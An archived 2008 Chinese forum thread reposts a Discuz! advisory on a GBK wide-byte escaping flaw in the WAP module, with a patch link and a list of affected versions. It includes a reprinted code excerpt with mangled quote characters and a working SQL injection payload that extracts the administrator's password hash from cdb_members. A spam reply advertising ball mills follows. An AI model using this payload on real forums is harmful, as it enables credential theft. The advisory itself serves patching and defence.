315技术社区's Archiver

咨询客服QQ:604164

政政 发表于 2008-8-4 23:04

Discuz! 论坛的 wap 功能出现攻击漏洞

发布日期:2008年8月4日

由于 PHP 对 多字节字符集的支持存在问题,在各种编码相互转换过程中,有可能引发程序溢出和程序错误。[b][color=red]此问题目前已经影响到 Discuz! 论坛的 wap 功能模块的使用,恶意用户可能通过 wap 功能对论坛发起攻击[/color][/b]。

补丁下载地址:
[url=http://download.comsenz.com/Discuz/patch/20080804discuz_fix_all.zip][color=#2366a8]http://download.comsenz.com/Discuz/patch/20080804discuz_fix_all.zip[/color][/url]


提示:如果您由于某种原因,无法及时修补,请您暂时关闭 "wap" 功能


具体分析:

[quote]

由于 PHP 对 多字节字符集的支持存在问题,在各种编码相互转换过程中,有可能引发程序溢出和程序错误

提交一个 ' 转意成 \' 然后转成gbk的,\和'就变成两个字符了 '就可以成功的引入

[b]影响版本:[/b]

Discuz!4.0.0
Discuz!4.1.0
Discuz!5.0.0
Discuz!5.5.0
Discuz!6.0.0
Discuz!6.1.0

[/quote]

[b]测试方法:[/b]

[quote]
if(defined('IN_DISCUZ')) {
exit('Access Denied');
}

define('CODETABLE_DIR', DISCUZ_ROOT.'./include/tables/');

class Chinese {

var $table = '';
var $iconv_enabled = false;
var $unicode_table = array();
var $config = array
(
'SourceLang' => '',
'TargetLang' => '',
'GBtoUnicode_table' => 'gb-unicode.table',
'BIG5toUnicode_table' => 'big5-unicode.table',
);

function Chinese($SourceLang, $TargetLang, $ForceTable = FALSE) {
$this->config['SourceLang'] = $this->_lang($SourceLang);
$this->config['TargetLang'] = $this->_lang($TargetLang);

if(!function_exists(’iconv’) && $this->config['TargetLang'] != ‘BIG5′ && !$ForceTable) {
$this->iconv_enabled = true;
} else {
$this->iconv_enabled = false;
$this->OpenTable();
}
}

function _lang($LangCode) {
$LangCode = strtoupper($LangCode);

if(substr($LangCode, 0, 2) == ‘GB’) {
return ‘GBK’;
} elseif(substr($LangCode, 0, 3) == ‘BIG’) {
return ‘BIG5′;
} elseif(substr($LangCode, 0, 3) == ‘UTF’) {
return ‘UTF-8′;
} elseif(substr($LangCode, 0, 3) == ‘UNI’) {
return ‘UNICODE’;
}
}

function _hex2bin($hexdata) {
for($i=0; $i < strlen($hexdata); $i += 2) {
$bindata .= chr(hexdec(substr($hexdata, $i, 2)));
}
return $bindata;
}
[/quote]

chinese.class.php (utf-8不能利用)
[quote]searchid=22%cf'UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=1/*&do=submit
[/quote]

abcd911 发表于 2008-11-10 06:41

球磨机 球磨机 节能球磨机 高能球磨机 湿式球磨机 干式球磨机生产及球磨机制造

[size=2][url=http://www.**/]球磨机 球磨机 节能球磨机 高能球磨机 湿式球磨机 干式球磨机生产及球磨机制造,我们生产的球磨机 节能球磨机 高能球磨机 湿式球磨机 干式球磨机及相应的球磨机产品,质量第一,并可根据客户对球磨机的需求,定制各种不同类型的球磨机 节能球磨机 高能球磨机 湿式球磨机 干式球磨机,如果有需要球磨机 节能球磨机 高能球磨机 湿式球磨机 干式球磨机或者定制球磨机 节能球磨机 高能球磨机 湿式球磨机 干式球磨机的客户请与我厂联系:0371-63859499.[/url][/size]

页: [1]

Powered by Discuz! Archiver 6.1.0  © 2001-2007 Comsenz Inc.